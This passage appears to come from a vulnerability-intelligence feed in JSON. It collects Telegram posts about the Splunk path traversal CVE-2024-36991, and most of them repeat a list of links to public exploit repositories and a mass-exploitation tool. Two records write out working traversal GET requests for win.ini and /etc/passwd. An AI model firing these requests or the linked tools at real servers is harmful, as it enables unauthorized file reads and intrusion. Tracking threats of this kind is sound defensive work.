The vulnerability allows for remote code execution as root due to async-signal-unsafe functions being called in the SIGALRM handler.\n\nPoC\nhttps://github.com/acrono/cve-2024-6387-poc\n\nCVE-2024-29849: Veeam Backup Enterprise Manager Authentication Bypass.\n\nPoC\nhttps://github.com/sinsinology/CVE-2024-29849\n\n#CyberDilara\nhttps://t.me/CyberDilara", "creation_timestamp": "2024-07-14T02:46:52.000000Z"}, {"uuid": "b9fc662c-da0c-4e27-aa2f-485061bf99f7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "published-proof-of-concept", "source": "https://t.me/CyberDilara/391", "content": "cve-2024-36991\n\nGET /en-US/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../windows/win.ini HTTP/1.1\n\nGET /en-US/modules/messaging/C:../C:../C:../C:../C:../etc/passwd HTTP/1.1\n\n#exploit  #poc", "creation_timestamp": "2024-07-13T13:25:46.000000Z"}, {"uuid": "29a7b43a-ed9d-4f32-8056-9bdeb6863a98", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "published-proof-of-concept", "source": "Telegram/TJyTqjGuKoeyQsqJBRghKspB6mZD1yySHXwgvIUIoB3qUVs", "content": "", "creation_timestamp": "2025-03-31T11:00:06.000000Z"}, {"uuid": "cb472a49-fddd-4c8e-9ee9-0f7a4be468b7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "published-proof-of-concept", "source": "https://t.me/proxy_bar/2152", "content": "CVE-2024-36991\n*\nSplunk  /etc/passwd\n*\nexploit", "creation_timestamp": "2024-07-06T07:49:45.000000Z"}, {"uuid": "1dc0cde4-870b-43f4-af12-c74d083231b6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": 
"published-proof-of-concept", "source": "Telegram/eVE5YmoRFUZV8c7TTGPUWrAfKBs48EKz-_YLWjtS9xYVJuE", "content": "", "creation_timestamp": "2025-03-30T23:00:06.000000Z"}, {"uuid": "eb51a57d-053c-42a1-a0cd-af213f5115bd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "published-proof-of-concept", "source": "https://t.me/GrayHatsHack/8212", "content": "Tools - Hackers Factory \n\nExploit \n\n1. CVE-2024-36991:\nSplunk Enterprise Path traversal\nhttps://github.com/bigb0x/CVE-2024-36991\n\n2. CVE-2024-22274:\nRCE in VMware vCenter Server\nhttps://github.com/mbadanoiu/CVE-2024-22274\n\n3. CVE-2024-36401:\nGeoServer Unauth RCE\nhttps://github.com/bigb0x/CVE-2024-36401\n\nGitHub - payloadbox/sql-injection-payload-list: SQL Injection Payload List\n\nhttps://github.com/payloadbox/sql-injection-payload-list\n\nGitHub - ThatNotEasy/CVE-2024-27956: Perform with massive Wordpress SQLI 2 RCE\n\nhttps://github.com/ThatNotEasy/CVE-2024-27956\n\nMemProcFS 5.10 released! Support for Windows 11 24H2 added!\n\nMemProcFS - super fast memory forensics of live memory and memory dumps!\n\nhttps://github.com/ufrisk/MemProcFS\n\nCVE-2024-37081: The vCenter Server contains multiple local privilege escalation vulnerabilities due to misconfiguration of sudo.\u00a0\n\nhttps://github.com/Mr-r00t11/CVE-2024-37081\n\nCVE-2024-36401: RCE for GeoServer version prior to 2.25.1, 2.24.3 and 2.23.5 of GeoServer.\n\nPOC for CVE-2024-36401 GeoServer. This POC will attempt to establish a reverse system shell from the targets.\n\nhttps://github.com/bigb0x/CVE-2024-36401\n\nCVE-2024-6387, targeting a signal handler race condition in OpenSSH's server (sshd) on glibc-based Linux systems. 
The vulnerability allows for remote code execution as root due to async-signal-unsafe functions being called in the SIGALRM handler.\n\nPoC\nhttps://github.com/acrono/cve-2024-6387-poc\n\nCVE-2024-29849: Veeam Backup Enterprise Manager Authentication Bypass.\n\nPoC\nhttps://github.com/sinsinology/CVE-2024-29849\n\n#CyberDilara\nhttps://t.me/CyberDilara", "creation_timestamp": "2024-07-14T04:09:19.000000Z"}, {"uuid": "18d673d5-4773-4620-9a87-63e690120ba6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/3405", "content": "Tools - Hackers Factory \n\nExploit \n\n1. CVE-2024-36991:\nSplunk Enterprise Path traversal\nhttps://github.com/bigb0x/CVE-2024-36991\n\n2. CVE-2024-22274:\nRCE in VMware vCenter Server\nhttps://github.com/mbadanoiu/CVE-2024-22274\n\n3. CVE-2024-36401:\nGeoServer Unauth RCE\nhttps://github.com/bigb0x/CVE-2024-36401\n\nGitHub - payloadbox/sql-injection-payload-list: SQL Injection Payload List\n\nhttps://github.com/payloadbox/sql-injection-payload-list\n\nGitHub - ThatNotEasy/CVE-2024-27956: Perform with massive Wordpress SQLI 2 RCE\n\nhttps://github.com/ThatNotEasy/CVE-2024-27956\n\nMemProcFS 5.10 released! Support for Windows 11 24H2 added!\n\nMemProcFS - super fast memory forensics of live memory and memory dumps!\n\nhttps://github.com/ufrisk/MemProcFS\n\nCVE-2024-37081: The vCenter Server contains multiple local privilege escalation vulnerabilities due to misconfiguration of sudo.\u00a0\n\nhttps://github.com/Mr-r00t11/CVE-2024-37081\n\nCVE-2024-36401: RCE for GeoServer version prior to 2.25.1, 2.24.3 and 2.23.5 of GeoServer.\n\nPOC for CVE-2024-36401 GeoServer. 
This POC will attempt to establish a reverse system shell from the targets.\n\nhttps://github.com/bigb0x/CVE-2024-36401\n\nCVE-2024-6387, targeting a signal handler race condition in OpenSSH's server (sshd) on glibc-based Linux systems. The vulnerability allows for remote code execution as root due to async-signal-unsafe functions being called in the SIGALRM handler.\n\nPoC\nhttps://github.com/acrono/cve-2024-6387-poc\n\nCVE-2024-29849: Veeam Backup Enterprise Manager Authentication Bypass.\n\nPoC\nhttps://github.com/sinsinology/CVE-2024-29849\n\n#CyberDilara\nhttps://t.me/CyberDilara", "creation_timestamp": "2024-07-14T11:05:42.000000Z"}, {"uuid": "d6cf6579-ece5-4f4d-87c9-1f9c097f2ec0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "exploited", "source": "https://t.me/true_secator/6008", "content": "SonicWall warns of a recent vulnerability in Splunk Enterprise for which a PoC has been published on GitHub, raising the risk of its exploitation.\n\nIt has also turned out to be more serious than initially thought, and can be 
exploited with a simple GET request.\n\nThe issue is tracked as CVE-2024-36991 with a CVSS score of 7.5 and is described as a path traversal flaw affecting Splunk Enterprise on Windows versions prior to 9.2.2, 9.1.5 and 9.0.10.\u00a0Splunk fixed it on July 1.\n\nAn attacker can use the vulnerability to perform a path traversal on the /modules/messaging/ endpoint if Splunk Web is enabled on the vulnerable instance.\n\nThe vulnerability arises because the Python\u00a0os.path.join\u00a0function removes the drive letter from 
path tokens if the drive in the token matches the drive in the constructed path.\n\nAccording to SonicWall, an attacker can use CVE-2024-36991 to list directories on the endpoint, potentially gaining access to sensitive files on the system.\n\nA crafted GET request to a vulnerable Splunk instance with Splunk Web enabled is enough to exploit the issue. 
\n\nThe attacker only needs to be able to reach the instance remotely, which can be done over the Internet or a local network.\n\nAccording to SonicWall, more than 220,000 servers are reachable online, some of which apparently remain vulnerable to CVE-2024-36991.\n\nGiven the availability of a PoC and the cyber underground's interest in using the vulnerability in real attacks, users are strongly 
advised to update their Splunk Enterprise instances as soon as possible or else disable Splunk Web.", "creation_timestamp": "2024-07-23T12:32:04.000000Z"}, {"uuid": "b5af17f2-28d8-478b-be24-8839fe2c4abe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "published-proof-of-concept", "source": "https://t.me/GrayHatsHack/6918", "content": "Tools - Hackers Factory \n\nExploit \n\n1. CVE-2024-36991:\nSplunk Enterprise Path traversal\nhttps://github.com/bigb0x/CVE-2024-36991\n\n2. CVE-2024-22274:\nRCE in VMware vCenter Server\nhttps://github.com/mbadanoiu/CVE-2024-22274\n\n3. CVE-2024-36401:\nGeoServer Unauth RCE\nhttps://github.com/bigb0x/CVE-2024-36401\n\nGitHub - payloadbox/sql-injection-payload-list: SQL Injection Payload List\n\nhttps://github.com/payloadbox/sql-injection-payload-list\n\nGitHub - ThatNotEasy/CVE-2024-27956: Perform with massive Wordpress SQLI 2 RCE\n\nhttps://github.com/ThatNotEasy/CVE-2024-27956\n\nMemProcFS 5.10 released! Support for Windows 11 24H2 added!\n\nMemProcFS - super fast memory forensics of live memory and memory dumps!\n\nhttps://github.com/ufrisk/MemProcFS\n\nCVE-2024-37081: The vCenter Server contains multiple local privilege escalation vulnerabilities due to misconfiguration of sudo.\u00a0\n\nhttps://github.com/Mr-r00t11/CVE-2024-37081\n\nCVE-2024-36401: RCE for GeoServer version prior to 2.25.1, 2.24.3 and 2.23.5 of GeoServer.\n\nPOC for CVE-2024-36401 GeoServer. 
This POC will attempt to establish a reverse system shell from the targets.\n\nhttps://github.com/bigb0x/CVE-2024-36401\n\nCVE-2024-6387, targeting a signal handler race condition in OpenSSH's server (sshd) on glibc-based Linux systems. The vulnerability allows for remote code execution as root due to async-signal-unsafe functions being called in the SIGALRM handler.\n\nPoC\nhttps://github.com/acrono/cve-2024-6387-poc\n\nCVE-2024-29849: Veeam Backup Enterprise Manager Authentication Bypass.\n\nPoC\nhttps://github.com/sinsinology/CVE-2024-29849\n\n#CyberDilara\nhttps://t.me/CyberDilara", "creation_timestamp": "2024-07-14T04:09:19.000000Z"}, {"uuid": "febf9935-9b5f-4c18-9d77-077df7c96a4d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "published-proof-of-concept", "source": "Telegram/CiyO7yHlQyQc7_ZHlNUUDNT8pEDVPJtVd9vkAk_eCKafKM_GYA", "content": "", "creation_timestamp": "2024-07-20T09:00:47.000000Z"}, {"uuid": "717dc267-2257-4cd4-a22d-c9f595ae4b5d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "exploited", "source": "https://t.me/haccking/11042", "content": "CVE-2024-36991\n\n#cve #exploit\n\nA mass scanning and exploitation tool for the CVE-2024-36991 vulnerability: a path traversal that affects Splunk Enterprise on Windows in versions below 9.2.2, 9.1.5 and 9.0.10. 
The exploit will attempt to read the Splunk /etc/passwd file.\n\nLink to the tool.\n\nLH | News | Courses | Memes\n\n#recommendation\n#recommendations", "creation_timestamp": "2024-07-14T10:35:09.000000Z"}, {"uuid": "53ca7d54-f82b-4ac7-9efb-7eb032ed711d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/2763", "content": "cve-2024-36991\n\nGET /en-US/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../windows/win.ini HTTP/1.1\n\nGET /en-US/modules/messaging/C:../C:../C:../C:../C:../etc/passwd HTTP/1.1\n\n#exploit  #poc", "creation_timestamp": "2024-07-07T12:26:51.000000Z"}, {"uuid": "8ffddf39-d9fa-48ac-89ea-b0a932209867", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "published-proof-of-concept", "source": "https://t.me/GhostClanInt/25267", "content": "Tools - Hackers Factory \n\nExploit \n\n1. CVE-2024-36991:\nSplunk Enterprise Path traversal\nhttps://github.com/bigb0x/CVE-2024-36991\n\n2. CVE-2024-22274:\nRCE in VMware vCenter Server\nhttps://github.com/mbadanoiu/CVE-2024-22274\n\n3. 
CVE-2024-36401:\nGeoServer Unauth RCE\nhttps://github.com/bigb0x/CVE-2024-36401\n\nGitHub - payloadbox/sql-injection-payload-list: SQL Injection Payload List\n\nhttps://github.com/payloadbox/sql-injection-payload-list\n\nGitHub - ThatNotEasy/CVE-2024-27956: Perform with massive Wordpress SQLI 2 RCE\n\nhttps://github.com/ThatNotEasy/CVE-2024-27956\n\nMemProcFS 5.10 released! Support for Windows 11 24H2 added!\n\nMemProcFS - super fast memory forensics of live memory and memory dumps!\n\nhttps://github.com/ufrisk/MemProcFS\n\nCVE-2024-37081: The vCenter Server contains multiple local privilege escalation vulnerabilities due to misconfiguration of sudo.\u00a0\n\nhttps://github.com/Mr-r00t11/CVE-2024-37081\n\nCVE-2024-36401: RCE for GeoServer version prior to 2.25.1, 2.24.3 and 2.23.5 of GeoServer.\n\nPOC for CVE-2024-36401 GeoServer. This POC will attempt to establish a reverse system shell from the targets.\n\nhttps://github.com/bigb0x/CVE-2024-36401\n\nCVE-2024-6387, targeting a signal handler race condition in OpenSSH's server (sshd) on glibc-based Linux systems. The vulnerability allows for remote code execution as root due to async-signal-unsafe functions being called in the SIGALRM handler.\n\nPoC\nhttps://github.com/acrono/cve-2024-6387-poc\n\nCVE-2024-29849: Veeam Backup Enterprise Manager Authentication Bypass.\n\nPoC\nhttps://github.com/sinsinology/CVE-2024-29849\n\n#CyberDilara\nhttps://t.me/CyberDilara", "creation_timestamp": "2024-07-14T11:05:50.000000Z"}, {"uuid": "7b6d234f-15c3-4b98-bf90-d8ed1d609ac6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/10795", "content": "#exploit\n1. CVE-2024-36991:\nSplunk Enterprise Path traversal\nhttps://github.com/bigb0x/CVE-2024-36991\n\n2. 
CVE-2024-22274:\nRCE in VMware vCenter Server\nhttps://github.com/mbadanoiu/CVE-2024-22274\n\n3. CVE-2024-36401:\nGeoServer Unauth RCE\nhttps://github.com/bigb0x/CVE-2024-36401", "creation_timestamp": "2024-07-08T03:16:55.000000Z"}]}